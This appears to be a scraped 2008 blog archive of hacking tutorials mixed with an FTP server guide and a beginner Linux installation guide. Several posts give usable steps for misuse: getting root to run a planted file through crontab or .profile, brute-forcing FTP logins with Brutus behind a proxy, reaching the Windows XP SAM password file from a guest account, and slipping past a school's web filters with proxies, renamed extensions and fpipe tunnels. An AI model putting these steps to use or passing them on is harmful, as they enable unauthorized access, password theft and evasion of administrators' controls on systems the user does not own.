Sends a message to the user when he changes to a different directory

-------------
Ratio, Quota, Bps
-------------

-------Ratio------

---Enable ratio---
Speaks for itself check this box to enbale the ratio

---upload/download---
The amount of bytes a user may Download or upload during 1 session

---credit---
I do'n really understand what this does i think it works with a knid of point system

---Count method---
The method the server counts the bytes and credits for a session

-------Disk Quota------

---enable disk quota---
Again it speaks for itself check the box to activate Disk quota

---current---
The actual disk zie occupation

---max---
Maximum disk space granted to a user

------speed limit------

---up/down---
The amount of data a user can download or upload from your computer

-------------
IP & Banned Files
-------------

---Banned Files---
Put banned extensions in the list like *.jpg and so on

---IP Access---
Put Banned IP addresses here, u can also use it to only give authorized users access

-------------
Notes
-------------
Put ure personal notes in the box

-------------
Status
-------------
Status of all download uploaded files and so on are stored here.

-------------
Conclusion
-------------
In this tutorial i showed you how to setup a FTP server on your own computer, and how to use its basic functions.
If you stumble upon errors or mistakes or you have a problem with understanding the tutorial, you can mail me at the e-mail address i provided below.
I hope you enjoyed reading this tutorial as much as i enjoyed writing it and i hope you had any use with it.

-------------
Disclaimer
-------------
I accept no responsibilities with any damage this tutorial may cause to your or anyone's computer, this tutorial
is for educational purposes only.

Root tricks

2008-12-10T23:53:00.001+07:00

Trick 1:
Enter a line in the crontab for root, to execute a file in the home directory
of the user you created. Then the file will be executed on the server with
root privliges. And just imagination sets the limit for what you can do.
Slackware also have /etc/cron.daily and then it is just to make a symbolic link.

Trick 2:
In /root there is a file called .profile witch is executed whenever root logs in,
you can enter a line to execute your file in there too. Then the file gets executed
evertime root logs in.

Trick 3:
Look at the crontab settings for root, any "legal" programs there? If there is,
change the name of that file in the crontab, then make a bash-script that will execute
your file, and the one that is suposed to be run. This of course might make some
trouble, but you will sort it out. :-)

I think your getting the idea now, and can think of some solutions yourself. Get to work now,
have fun.

Recovering Your FTP Password

2008-12-10T23:43:00.002+07:00

Ok, I’m assuming you have downloaded and unzipped Brutus.

Open Brutus.

There a couple of things we will need to change.

- Change the Target field to your ftp server (In my case it is ftp.angelfire.com)

- Change the type drop-down menu to FTP.

- I would recommend using a proxy, but that’s up to you. If you don’t use one, you can get in a lot of trouble! Don’t say I didn’t warn you!

- Under “Authentication options” tick “Single User”, then in the User ID box, type your FTP username.
- Go to pass mode in the “Authentication Options”, you can change this to either three things:

1. Word List
This goes through a list of words and tries every single one, if one of the words is your password, it will tell you when you start cracking.

2. Combo List
This is only good if you want to try a number of different usernames.

3. Brute Force
This can take a long time, but will almost defiantly find your password! (Assuming you define the settings right.)

- For this tutorial, I am going to use Word List. “words.txt” should already be selected, but if you want to use a bigger word list, hit the “Browse” button.
The settings you should be using if you’re getting your password from an Angelfire Account. (Don’t forget to change the username!):

Ok, once all the settings are in, hit start!
When/if its finds a password, it will make a Beep noise and show you the password in the “Positive Authentication Results” Box.

Good luck!
Hope you can find your password!

Guide to Linux

2008-12-10T23:42:00.001+07:00

1.0 - Intro

Linux- sometimes referred to by the press as 'Windows NT's worst enemy'.
Wired Magazine once called it 'The greatest story never told'. This is a
perfect definition because the story behind Linux is indeed a great one, yet
it is unknown to so many people. Let's start at the beginning.

Back when 'Stayin' Alive' was still topping the charts, and Microsoft was
a spec in the world of computers, AT&T produced a multi-user operating
system and labeled it 'UNIX'. Throughout the years, UNIX caught on and
many different versions of it began to come out. A popular one, called
'Minix' (mini-UNIX) was available for use at The University of Helsinki in
Finland. A student at the University named Linus Torvalds believed he
could create an operating system superior to Minix. In 1991 he started
his new operating system as a side project, but it soon developed into a
full-time hobby until 1994 when the first official version of the
operating system was released.

You're probably now saying 'so what's the big deal about Linux? Isn't it
just another operating system?' Absolutely not! First of all, Linux is
released under something called 'open source license'. Open source is really
more of an idea than a thing. Linux is released with all the source code and
files that it was made with. This means a few things. Anyone who is good
at programming can mess with the Linux code and release his own version of
it. This also means that even though if you buy Linux in a store it will
cost money, you're not paying for the actual Linux itself. Your money goes to
the price of packaging, the extra software that comes with the operating
system, and technical support. The second, and most important reason that
Linux is a big deal is because it's a much more stable operating system than
Windows. It runs on any system; even bottom of the line 386's from before
Linux even came out. Programs running under Linux almost never crash, and in
the off chance that one does because of bad programming by the program author,
it will not take the operating system down with it. Another important reason
Linux is good is that it is secure. It is much harder to bring down by a
hacker than Windows is (for further reading, read the 'Basic Unix Security
Guide' by R a v e N at blacksun.box.sk). This is just an extremely short list
of the reasons why Linux is so great. For further reading check out
www.linux.org

This tutorial is for Windows users who want to migrate to Linux. This is
written for Redhat or Mandrake Linux (the two most easy-to-install and
user-friendly Linux distributions), but the information here will most probably
help you with whatever distribution you are using. The only problem with this
is that Mandrake and RedHat are relativley simple to install, and some other
distrobutions are much more complex. I highly suggest you buy Linux-Mandrake
rather than RedHat. Mainly because it is cheaper and comes with more
software, but as you read through this tutorial, you'll see more reasons why I
recommend Mandrake.

The first thing you're going to have to do with your new operating system is
install it- but you can't do that so quickly.

2.0 - Preparation

If you already have Microsoft Windows on your system and you want it to
co-exist with Linux, you are going to have to create another hard drive
partition. What a hard drive partition is a totally separate part of a
hard drive. If two hard drive partitions weren't physically part of the
same disc, they would be two different hard drives. Anyway, the reason
for this is that Windows and Linux are totally different in the way they
access hard drives and handle files. If they are using each other's hard
drive space the two operating systems can conflict and cause major problems
for your computer. Well, as I was saying, you need to create a hard drive
partition reserved for Linux. There are MS-DOS programs that do this, but
they are "lethal" partition making programs. By this I mean that while making
a new partition, they can destroy or at least corrupt files on another
partition. If you want to make a partition for Linux, without killing your
Windows files you need a "non-lethal" partition program. If you get
Linux-Mandrake, a "non-lethal" partition program is included with it (this is
just one of the reasons why I recommend Mandrake over RedHat).

Well with all this talk of partitions and hard drives, you must be wondering
roughly how much hard drive space you'll need for Linux. If you want the
complete system with everything, you'll need about 1.5 gigabyte+ hard drive
space. However it is possible to productively run a full Linux distribution
(there are "miniature" Linux distributions that range from around 2 to 35
megabytes, and there's also Trinux, which runs from two 1.44MB floppy disks!
Get it from www.trinux.org) to with as little as 150 megabytes. Trust me, you
don't want EVERYTHING. Linux comes with tons of software you'll probably won't
need. For example: Linux comes with a variety of network servers - a web
server, a Sendmail server, a telnet server, an FTP server etc'. If you choose
not to install something and then regret, you can still get it later off the
original installation CD.

So anyway, if you have sufficient hard drive space, and a "non-lethal"
partition program, you're ready to proceed to the next step: installation.

***Even if you're using a "non-lethal" partition program, I suggest you
backup your Windows files just in case something goes wrong.***

3.0 - Installation

Now that your computer is ready for Linux, you're ready to install it.
When you bought the software, it probably came with a few CD's and a disk.

The disk is boot disk for the Linux installation program. You pop in the
disk, reset your computer, the installation program begins, and you're
ready to install Linux. The only thing is that the installation program
will take a while to load since it's from a disk.

**The stuff on the disk is probably just a duplicate of some of the stuff
on the first CD. If your computer is capable of booting from a CD (and
most newer ones are, otherwise, check your manual) then instead of putting
the disk in your computer then rebooting, put in the first CD as it will
load much quicker. Of course, you'll need to mess with your BIOS
configurations first, but that's no big deal. Hit del when your computer
boots up (after it tells you how much RAM you have) and mess around with it
until you can find out how to make your computer attempt to boot from your CD
drive first. This differs from different BIOS systems.**

3.1 - Ok..You're finally ready to install Linux.

The first few questions the install program asks you are self explanatory,
just things like your language and stuff. One thing you might get stumped
on is when you are prompted on whether you have any SCSI adapters or not.
An SCSI adapter can be anything such as a mouse, printer, scanner, etc. It
all depends if you have an SCSI controller. Chances are, you don't have any
SCSIs, but check your manual to be sure. Also, if you are completely sure
that your copy of Microsoft Windows is properly-configured, you can quit the
installation program at any time, return to Windows, run control panel, click
on system and find out all the information you'll need about your system's
hardware.

3.2 - More Partition Stuff

The next thing you might have trouble with is a dialog box that appears
asking you some questions about your hard drive partitions. The name of
the dialog box should 'Disk Setup'. There should be three buttons on the
bottom of the box. One labeled 'Disk Druid', another labeled 'fdisk', and
the last is the back button. Since you already set up your partitions,
select 'Disk Druid'. If you originally only had one partition with
windows, then the top of the screen should look something like this:

Mount Point Device Requested Actual Type
hda1 ??MB ??MB Win95
hda2 ??MB ??MB Linux Swap
hda3 ??MB ??MB Linux Native

Mount point should be blank.
'Device' is the name of the partition
'Requested' is the amount of hard drive space you wanted for the partition
'Actual' is the amount of hard drive space that is really in the partition
'Type' is what's in the partition

**The 'requested' and 'actual' sections for the 'Linux Swap" type should
be the amount of RAM you have.**

**It looks confusing, but in reality if it is simple. Don't worry if your
screen doesn't look exactly like my diagram, it probably won't.**

What you should do now is select the 'Linux Native' section (by pressing
tab to get to that part of the screen, then using the arrow keys) and then
press tab again until the 'edit' button is highlighted. Pressing spacebar
will bring up another dialog box. In the space provided, put a slash (/)
then press OK. Now you're back at the main screen. Press tab to get to
OK, and then press spacebar.

**what you're actually doing here is telling the computer to put the root
directory, signified by the slash, in the Linux Native partition. The
root directory '/', is similar to 'C:\' in DOS/Windows.**

Next you come to a screen asking which partitions to format. Select the
one that 'Linux Native' is in. You should select the '/dev/xxxx/'
partition where 'xxxx' is the name of the device that the Linux Native
partition is under. This is where you put the '/' on the last screen. If
the Linux Native partition device was hda3 then choose '/dev/hda3', if it
was hda6, then choose '/dev/hda6', you get the point.

**IT IS VERY IMPORTANT THAT YOU DO NOT SELECT THE WRONG PARTITION TO
FORMART!**

3.3 - Selecting What to Install

Suppose you had three hard drives on Windows - c:\, d:\ and e:\, and you
want to install Linux on d:\. Windows assigns the letter c to the first
hard drive it finds that has a DOS/Windows file partition, d to the second
DOS/Windows-compatible hard drive etc', so this might help you out
determining which device to choose. Also, if you turn d:\ into the Linux
hard drive, it will disappear from DOS/Windows, and e:\ will turn into
d:\.

You're not finished yet, but take a sigh of relief, the hardest part is
over. Next comes the screen asking which packages to install. Some of
the most important ones are selected already. If you have a lot of hard
drive space, select all the other packages. Otherwise, just select the
others that you think are important. Definitely select 'KDE' and 'GNOME'.
Those are window manager programs for the X-Windows system (a GUI - Graphical
User Interface), and we'll deal with them later. Anyway, newer versions always
come with new software and/or updates for old software.

Press OK and the Linux installation begins!

3.4 - Misc. Configurations

After everything has been installed, you are prompted for more things.
The first should be what resolution your monitor is. Most people would
like to use the same resolution they use on Windows, so if you don't know
which resolution you were using until now, switch back to Windows,
right-click on your desktop area, click properties and find the settings
tab. You should see your current resolution there. This would probably be
the same resolution you would want to use on Windows. If you want a higher
resolution, consult your monitor's manual to find out how high you can go.

Next is the mouse configuration. If your mouse is not on the list, select
'Generic PS/2 Mouse'.

There are more such as clock set and time zone but those are
self-explanatory. After this, comes the services screen. These are the
things that will startup when you run Linux. Then it will prompt you for
if you want the X-Windows interface to run when you start Linux. If you are a
Linux newbie (and you probably are, unless you weren't reading this guide), I
suggest you do this. X windows is the GUI system, as explained before.

The last configuration is the printer. This is self-explanatory.

3.5 - Configuring Users

Ok...you're almost done; the configurations are pretty much finished. Now
you will be prompted to create a password for the root operator. Even though
it is still very popular on single home users, Linux is a multi-user operating
system. Even if you'll be the only person using your computer, having a
multi-user system is quite benefical. For example: you can use a
less-privileged user to prevent yourself from doing stupid things and messing
things up. You can run sensitive software which can be broken to (say, some
sort of a server. For example: a Sendmail server for outgoing mail if you're
planning to let people sent mail from your machine, or a web server if you
want to serve a website off your computer) as a less-privileged user, so if
someone will manage to exploit some hole in this software, he will have very
limited privileges (up to what the program needs to run properly) and he won't
be able to do much, or nothing at all in most cases (he won't have read
access to password files, he won't have write access to the website's files
so he won't be able to alter them etc'). On any UNIX-based system (and there
are many) the main user is called 'root'. The root has supreme power over the
system and supreme power over all the other users. In fact, he has unlimited
power (unless he or another root-privileged user chooses to impose access
limits, but root-privileged users can always restore their rights to the
fullest).

My root password is a particularly simple one. Mainly because I am the
only one who uses Linux on my computer (and besides that I trust my own
family!) and that my Linux system is not connected to the Internet (so
hackers [or crackers I should say] would have no way to get into my
system). Make your password anything not to complicated that you'll
forget it, but something that is very hard to guess.

After you're done making a password for the root user, you're prompted to
create an unprivileged, or ordinary user account. You make the user name,
credentials, and password. It may seem pointless at first to create
another user- especially an unprivileged one if you are the only one who
is going to be using Linux. However there is a big advantage to it. As a
root user, you can do anything to the system, including seriously messing
it up. Nothing will stop you because you are root. An ordinary user
account is like security so if you mess up, the system will stop you.

3.6 - Booting Configurations

Next you are asked if you want to create a boot disk. I strongly recommend
this because it will put the Linux boot stuff on the disk, not your computer.
If you put the Linux boot stuff on a computer with windows, it may conflict
with the windows boot stuff in case you ever reinstall Windows (go to
blacksun.box.sk/byteme.html and read #18 for a good example).

The Linux 'boot stuff' I'm talking about is a program called 'LILO'.
That's short for 'Linux Loader'. Anyway LILO installs itself to the boot
sector of the computer. The problem is that Windows also installs stuff
to the boot sector. LILO can install over Windows and let you choose to
either boot up Linux or Windows whenever you start up your computer. If you
choose Windows, it'll use Windows' "boot stuff".

Anyway, in my opinion, when the install program asks you to create a boot
disk, click Ok, then follow the directions to create a boot disk. Oh yeah,
by the way, when you make a boot disk, it puts LILO on that disk. When it
asks you to install LILO, just press Skip (unless you want to install
LILO, which most users will).

Congratulations! You're done installing Linux! When the installation
program ends, take the installation boot disk out of the drive. If you
booted the installation from CD, don't forget to take that out too.

4.0 - Running Linux

I bet you're glad to finish that installation! Now you're finally ready
to run the system. If you decided to create a boot disk, insert that into
the disk drive. If you decided to install LILO, just sit tight for now.
Regardless of what you did, reset your computer. If you used LILO, you
will get a prompt to load Linux or Windows. If you used a boot disk, the
system will startup automatically.

After the system starts up, the will get prompted for a user name and
password. This will look different depending on how you configured it in
the installation. If you chose to start the X Windows GUI automatically,
the username and password screen will look like it does in Windows (well,
sort of. X-Windows is much cooler, unless you're using some lame version of
it or some lame window manager). If you chose not to load the X Windows
interface at startup (like most advanced users will), you'll be presented
with a text-based interface. The text-based interface (the command console)
is much faster than the graphical system, but this also means you cannot view
any graphics until you start X-Windows (this is a good time to mention that
most people just call it X). Anyway, you can always run a command console
from an X window (usually called an "XTerm", which stands for X Terminal).
Anyway, the login screen will look pretty much the same regardless of
whether you are using RedHat or Mandrake.

If you're wondering what to type in the username box, that's easy. Your
username is 'root' (remember?). The password is the one that you selected
at installation.

5.0 - Using Linux

5.1 - Intro To The Console

Even though you'll probably be able to do everything with ease using the X
Windows GUI, there is still some stuff you should know. First off, don't
rely on a GUI for everything! That is very important because you will
learn a lot by using the console. The console is more powerful and can do a
lot of things you would REALLY like if you'll just grab a good basic Unix book
and start learning. After you do, you'll find yourself often opening an XTerm
window to run some console commands which you cannot run from X. If you
selected to start the GUI interface when Linux loads up, there are still lots
of ways to get to the console.

The console prompt should look somewhat like this (if you're logged in as root):
[root@localhost.localdomian]#

The first part identifies who you are, and the '#' is the actual prompt.
Any almost and UNIX type system, the '#' means you are root. On non-root bash
consoles (BASH - Bourne Again Shell. BASH is the most popular text-based
shell. Confused? Don't worry, we'll get to that in a second) this will be
replaced with a $. Anyway, you can change the prompt, but we won't get into
that now.

5.11 - Shells

You use a shell everytime you're in the Linux console. What a shell is,
is the program that communicates between you and the Kernel (the kernel is
the core of the system). Let's think of it as an interpreter for for two
people who are trying to have a meeting, except they don't speak the same
language. One speaks English and the speaks, oh let's say Hebrew (about half
the members of Black Sun Research Facility (blacksun.box.sk if you don't
know the URL yet. Also, if you havn't noticed, I'm a member of BSRF) are from
Israel). To communicate with each other they need a guy who speaks both
English and Hebrew. If the English guy wants to tell the Hebrew guy
something, he tells it to the interpreter in English, and then the
interpreter tells it to the other guy in Hebrew, and vice versa. Well
anyway, getting back to the subject, this is the case with Linux. Your
language is the Linux commands, and the Kernel speaks it's own very complex
language. When you want to talk to the Kernel, you tell shell in your
language, and the shell tells it to the Kernel in it's language. On any Linux
system, there a few shells. Some of them are:

ash
bash
bsh
csh
tcsh
zsh

The most popular and powerful shell is 'bash' (borne again shell). We
won't go that much into shells, because you don't need to know that much
about them just yet.

5.2 - Navigating The File System

The most important thing to know when using the console is how to navigate
the file system without a graphical program.

The first thing to understand about this is that the bottom directory, the
directory that everything else is a subdirectory of is '/'. It's like
'C:\' in Windows.

Ok, you start at the console and as a default you're either in your home
directory (every user has a home directory which contains his personal
configurations files). Now you want to navigate to another directory. But
wait, you don't know any other directories! You'll a directory listing for
this, right? To do this type 'ls' at the prompt. 'ls' is the equivlant to
'dir' in MS-DOS, and stands for list. You'll get a list of files and
folders. To make the list a bit more readable, try ls -Fla. The -a shows
files which start with a period (for example: .Xclients-default). The -l
displays file permissions and displays everything in neat columns. The -F
option adds a / after a directory and a * after an executable file. I also
suggest using ls -Fla --color to let the system color-code different files
(may not be available on some systems).

Anyway, now that you what directories there are, you need to know how to
get into them. Luckily, you use the same command as you you use in
MS-DOS, the 'cd' (change directory) command. Let's say you're at the
bottom directory, '/' and you want to get to '/root'. You simply type
'cd root'. There is no need to type 'cd /root', because you're already in
'/'. Now let's say you want to get to '/root/bin'. This would be done by
typing 'cd bin'. There is no need to type 'cd /root/bin' (the "full path" of
the directory), since you're already in '/root'. Instead, you can use a
"relative path", which is a path that is relative to the current directory
you're in. Type pwd to find out where you are (pwd stands for print working
directory).

Now let's say you're in '/root/bin' and you want to get to '/usr'. You would
type 'cd /usr'. This is to signify that the 'usr' directory is under '/', not
'/root/bin', or even '/root'. Got it? Ok, just one more thing. If you're in
a subdirectory, and you want to get to the top directory, just type 'cd ..'.
Let's say you're in '/root/bin', and you want to get to '/root'. You could
just type 'cd /root', but hey, '/root' is five characters! If you want to
save precious miliseconds, just type 'cd ..', since '/root' is the directory
in which '/root/bin' is a subdirectory of. So in other words, . is the
current directory, .. is one directory above, ... is two directories above
etc'.

5.3 - Basic File and Directory Commands

There are lots of file and directory commands in Linux, but we'll start
with directory commands because they're easier. First off, you have
'mkdir'. 'mkdir' stands for make directory and the context is:

mkdir the_directory_you_want_to_make

Some rulse apply. If you're '/', it will make the new directory under
'/'. If you're in '/usr', it will make the directory under '/usr'. Of
course though, if you're in '/' and you want to make a directory called
'stuff' under '/usr', you would simply type '/usr/stuff'.

The next command is the 'rm' command. It works with files and direcotires
and is used to delete some, it stands for 'remove'. If you want to remove
a file called 'this.gif', you would go to the directory where that file is
and type 'rm this.gif'. Or let's say again you're in '/' and 'this.gif'
is in '/usr', you would type 'rm /usr/this.gif'. It works the same way
with a directory.

Next are the 'cp' and 'mv' commands. They're both relativley simple, but
we'll start with 'cp'. 'cp' stands for copy, and is used to copy a file
from directory to another. The context is:

cp /directory_where_it_is/filename /directory_where_you_want_to_copy_it

Of course if you're already in the directory where the file is, all you
need to type is:

cp filename /directory_where_you_want_to_copy_it

'mv' works the exact same way, except it moves the file instead of copying
it. This means it deletes in from the original directory and puts it in
the new one.

5.4 - Finding and Viewing Commands

To find a file, oyu use the 'find' command. It then followed by the
directory where you want to start looking, then the '-name' arguement to
say that you're searching for a filename. Next you type the name of the
file. Let's say you're looking for the 'this.gif' in the '/usr'
directory, the context would look like this:

find /usr -name this.gif

The find command doesn't stop at filenames, it can also search a file for
a paticular string of text. It has the same context as the find file
command except you put quotes and asteriks around the string of text. So
if you wanted to search the '/usr' directory for a file containing the
string 'hello', you would type

find /usr -name "*hello*"

Ok, once you find a file, you want to view it right? Well, you could open
the file with a text editor, but we haven't learned to use tetx editors
yet, and anyway if the file you want to view is important you might
accidently change it and save it using a text editor. That's what the
'cat' command is for. Let's say you want to view a file called
'stuff.txt' in '/root'. You would navigate to the '/root' directory and
type 'cat stuff.txt'. Or from any directory, type 'cat /root/stuff.txt'

-= For more commands, buy a good basic Unix book =-

5.5 - linuxconf

There are lots of commands in Linux for configuring everything to user
passwords, networks, and the message that comes up when you start Linux. With
so many things to configure, luckily there is one program that does it all.
Just type 'linuxconf' at the command prompt, and you'll be brought to the
Linux Configuration program.

5.6 - Mounting

5.61 - Mounting Drives

In Linux, drives not only have to be physically mounted to the computer, but
mounted in software too. In the KDE and GNOME GUIs, you can easily mount a
CD-ROM or disk drive by clicking on the 'CD-ROM' or 'Disk Drive' icons on the
desktop.

5.62 - How to mount

Remember earlier in this tutorial when we went over how a hard drive partition
is almost like a separate hard drive? Well, just like a separate drive,
partitions also have to be mounted. The main use in this is being able to
mount Windows partition and access Windows files in Linux. Obviously, Windows
software will not run under Linux but there is still a use for accessing
Windows files in Linux.

Let's say you can't use the internet in Linux. You ISP only allows to
dialup with software and they don't make it for Linux, you're not used to
Linux yet so you don't want to use the net in it yet. This is a down
point, but it doesn't mean you can't download Linux files to use. All you
have to do is download the files in Windows and access them in Linux.

To mount a windows partition in Linux, yhe first thing you must do is
create a directory in Linux where you will mount the windows partition to
reside. Go into file manager (it should be under utilities no matter what
distribution you're using) and create a new directory under '/'. Call
anything, I suggest calling it 'windows'. Now exit file manager and go
into 'terminal' (should also be under utilities). Terminal will give you a
command prompt just like MS-DOS. This is what you would have to do
everything from if there were no X Windows GUI. The command to use is
simply enough- 'mount'. But don't type it just yet, you need to give the
system more info. The full command is

mount -t vfat /dev/xxxx /yyyyyyy (yes there is a space between 'xxxx' and '/')

Or mount -t vfat32 /dev/xxxx /yyyyyyy in case this is a FAT32 partition.

Where 'yyyyyyy' is the directory you just created, and 'xxxx' is the device
name of the partition where Windows resides. It is usually hda1 or something.

There, now just go into file manager and click on the directory you created
and you will have all the files that are on your windows partition.

When you're done, don't forget to unmount the drive by typing:

umount /dev/xxxx /yyyyyyy

Each time you want to access your windows files, just mount the partition
(unless they're set for automount. Edit /etc/fstab, find the line that
represents your Windows partition and look for a place with says noauto. If
you find the word noauto, change it into defaults. If you don't, your
Windows partition will probably get automounted whenever you boot-up Linux).
When you're done with them, just unmount the partition.

5.7 - Runlevels

While Windows is booting, have you ever pressed the F8 key? Well, if you
have, you're probably familiar with a screen that pops up giving you a
list of ways you can load Windows. There's safe mode, command prompt,
step-by-step confirmation, etc. Linux has something just like that, and
they're called 'runlevels'. There are six runlevels in all, and some are
pretty much the same. A runlevel is a list of commands to load-up as soon
as you start up Linux (there's a mini-tutorial about runlevels at
blacksun.box.sk/byteme.html). Your default runlevel is probably 5. If you
configured the GUI to start up when you boot the system, and if your default
runlevel is 5, then that is the runlevel configured to boot the GUI when it
starts up...simple, right?

Well anyway, if you use linuxconf to change your default runlevel to 2 or
3 or something, then you change it so that the GUI won't start as soon as
the system boots....all without touching the actual runlevel. When you
want to change it back, just use linuxconf to set the default runlevel
back to 5.

Now let's say you only want to load it without the GUI coming up once.
Instead of having to change the configuration in linuxconf, and then
changing it back, you can load Linux into another runlevel. Suppose You
want to load runlevel 2...not for any paticular reason, just because it's
not configured to load the GUI when it boots up, and well, you like the
number 2. To do this, as soon LILO comes up (whether it's on your
computer, or your boot disk), you have the option to type something next
to 'boot:'. Just type 'linux x'. 'x' refers to the number of the
runlevel, in this case the number 2, so you type 'linux 2', and press
enter. This will load Linux without loading the GUI. When you restart
Linux, it will load the default runlevel again.

For an interesting runlevels-related local hack, read the Byte-Me mini-tutorial
about runlevels at blacksun.box.sk/byteme.html.

You are now officially a Linux user. Check out www.linuxlinks.com for
links to some great Linux sites. The best way to learn about Linux is by
messing around with it. In an hour of playing with Linux you can learn a
lot. If you want more interesting yet simple and easy-to-understand tutorials,
check out http://blacksun.box.sk.

Hacking WinXP

2008-12-10T23:32:00.000+07:00

We all know WinNT's SAM file, the file where all the passwords are stored.
We also know how easy it is to crack that file and get accesss to all user accounts.

Thaught the problems were fixed in WinXP?
WRONG!!

Again, MS had shown us they are stupid. XP... whatever...

To get to the SAM file with the GUEST (!!!) account, all you have to do is to find the "System Restore" directory.
This is the directory where all of your computer registry, files you open and logs of stuff you do are being stored.

Since this place is being cleaned rarely (maybe never), it could get up to 500+ MB!
The name of the System Restore directory is not accessable by the "regular" methoods.

It should look like this: (i think its diffrent for every comp)

C:\System Volume Information\_restoreEFD2B458-5961-41F9-973B-04938D33D24E\

The "System Volume Information" dir is not accessable, even for an administrator, and even if you try accessing
the "_restoreEFD2B458-5961-41F9-973B-04938D33D24E" dir right away, you wont succeed (this was fixed in an update).

So what do we do? Back to the DOS ways!
Just enter drive C:\ (or whatever drive they installed it too).

Oh no! the files are hidden!! Is that suppose to scare someone???

Click there to view the files, and in the address bar, write:

C:\system~1\_resto~1\

You're in!
See these folders? each of them is a season that was preformed in windows.
Enter the most current one (the highest number), and then to the "snapshot" dir.
See this? _REGISTRY_MACHINE_SAM

Network Firewall Security

2008-12-10T23:30:00.000+07:00

The Schools Network

Internal Computers ----> Router ----> MS Proxy ----> Firewall ----> The
Internet

>From this setup the configuration seems like they are pretty secure from an
outside line attack. How I know because you never get the inner domains IP
one the referred one the proxy spits out back to you.

Now then the problem with the network is that it has too many restrictions.
Some of them include
No downloading of Exe Zip Wav files
No downloading of MP3's
Banning of Popular Email Services
Banning of Shopping & entertainment sites
Port blocking (no FTP, Telnet, etc.) only port 80

I was generally pissed that I couldn't download what I wanted or go to check
my email daily and thus was determined to successful work my way into
management.

The solution is simple and practical
To start with let's get past this crappy ms proxy. First off you can't do
the simple disable the proxy like we had done in the past. For the new guys
this is where you would just go to your "Tools" then "Internet Options"
"Connections" and depending on your settings uncheck the proxy. The Admin's
have gotten a lot tighter and well now they made it so that authentication
is needed to overcome the use of a proxy. So unless you are somehow a genius
and can get the passwords to the proxy servers then you're stuck using that
temp account you have and finding other solutions. In the old days to get
past a website ban we could find a mirror or let's say for hotmail . we
couldn't go to www.hotmail.com because that was banned but instead the
backdoor was at www.msn.com where a user could login from there. But they
caught on because the info always gets leaked and the whole domain of
Hotmail gets blocked. So a solution rumbles into my head and im thinking
PROXY! But I can't change the proxy settings to use another one. Ah, but
there is such things as proxy chaining. So let's go over what to do. If your
experienced user then you have probably traveled to
http://www.anonymizer.com/ once upon a time. This is an online proxy server
that hackers used back in the day...COUGH...COUGH. that is to say "before"
they started charging money to use there service. Every hacker knew that it
was a safe bet that you couldn't be tracked from this service. It's
basically like a 3 way phone call. You connect to there server and there
server connects to the webpage you want. Then there servers send you back
the info you requested. Simple right!

Now there are other sites that have spawned off the great anonymizer
that offer similar services and well you are just going to have to look
around for those. But wait there's more to this story, you see after the
news got around that the few and elite could get past the restrictions with
anonymizer well, the ADMINS started to notice what was going on and banned
that site as well. Moving on to how Google.com can also help. Google.com can
help because it caches its pages. Try this, do a search on google.com and
then look at the results you see below the results the section underlined
Cached. This means google.com has already indexed that site and you can pull
up all those banned websites that you really want to checkout with
google.com. But this wasn't the route I wanted to take because I still
couldn't use my email. In the end I decided to go to an old friend of mine
made by James Marshall. It's called "CGI proxy". Best script out there. What
CGI Proxy is, is a cgi script so that you can set up a web based proxy.
This script is easy to setup and can be hosted on websites. It serves as a
proxy server and thus you can use it to search the web. PLUS there's a
version out there that supports SSL. why would that be important you ask
well because hotmail uses SSL authentication so that you can get into your
email. So I setup the script takes 5 minutes and im up and running and the
school has no idea. So a basic run down is grab a copy of CGI proxy set it
up run it and be on your way searching through a proxy just like
anonymizer.com.

To get past the mp3 restrictions I was furious, for the longest time I
thought the school got the best of me but I was wrong I looked into the
matter and well. WINDOWS MEDIA PLAYER was my clue. There's a file format
that windows makes its called WMA. This file extension wasn't blocked
because it's less widely used. So now it was a matter of hosting "WMA" files
that I later would converted from mp3 and uploading them to be downloaded.
If your having similar problems there's more than 1 way to skin a cat.My
second method was rather cleaver and sneaky. I was inspired from a site
where I was downloading mp3s. The mp3s were named rather differently that
before with extensions like nameofgoodsong.aab or something not the standard
nameofgoodsong.mp3. What I did was change the extension of the files that
would be blocked to some other extension that wasn't noticeable and wasn't
blocked. For example upload coolapp.exe and when it's done rename it to
coolapp.haha
Then when you're downloading it right click on the file and save file as
Rename it to coolapp.exe and it should save and be just like normal.

Now then getting a chat service to work was rather fun and
challenging. Since I was limited to only port 80 there's no way in hell I
could connect to Windows messenger, YAHOO, AIM or any other leading chat
program. Because Windows Messenger aka MSN messenger connects on port 1863
to communicate to its server.
My working solution is to make and create a 3 way connection.
Again it would look something like this

Internal Computers (port 80)----> Router (port80) ----> MS Proxy (port
80)----> Firewall -(port 80) --> The Internet (port 80)--> (port 80) REMOTE
SERVER( redirected to port 1863) ---->WINDOWS MESSENGER SERVERS (port 1863)

And back

(port 1863) WINDOWS MESSENGER SERVERS--> (port 1863) REMOTE SERVER
(redirected to port 80)-- > The Internet (port 80) --> Firewall (port 80)-->
MS Proxy (port 80) --> Router - (port 80) --> Internal Computers

OK now then the REMOTE SERVER serves as the middle man for this to work.
You see your about to connect to the remote server and then have the remote
server connect to windows messenger servers for you. Then windows messenger
sends the info back to the remote server and back to you on port 80.

To do this you need 2 things 1st is Fpipe and 2nd is a second server that
fpipe is going to run on.
When you start fpipe you get something that looks like this from the
dos/command prompt screen.

C:\>fpipe
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com

FPipe [-hvu?] [-lrs ] [-i IP] IP

-?/-h - shows this help text
-c - maximum allowed simultaneous TCP connections. Default is 32
-i - listening interface IP address
-l - listening port number
-r - remote port number
-s - outbound source port number
-u - UDP mode
-v - verbose mode

Example:
fpipe -l 53 -s 53 -r 80 192.168.1.101

This would set the program to listen for connections on port 53 and

when a local connection is detected a further connection will be
made to port 80 of the remote machine at 192.168.1.101 with the
source port for that outbound connection being set to 53 also.
Data sent to and from the connected machines will be passed through.
.................

Now then the demo they show us can be useful for the user to figure out what
Exactly it is that we are going to do.

First let's think about what we exactly are going to accomplish. You are
going to send a request through port 80 from within your network to your
remote server that is hosting fpipe. Then Fpipe on the remote server
receives the incoming info from port 80 that you have just sent out and
redirects the outgoing info to port 1863. The send info that just went out
through fpipe leaves through port 1863 and now goes to windows messenger
server where it communicates with login info and then sends the info back to
our remote server through the port of 1863 where our remote server transfers
that info back out through port 80 to us.

The command line for fpipe to run on the remote server would look like this.

fpipe -l 80 -s 1863 -r 1863 messenger.hotmail.com

Simple Steps to Remember

1. Download Fpipe from http://www.foundstone.com
2. Set up your windows messenger client to connect to a proxy
3. Change the proxy info to http proxy the server would be your remote
server you have fpipe running on. And the port for the proxy is of course 80
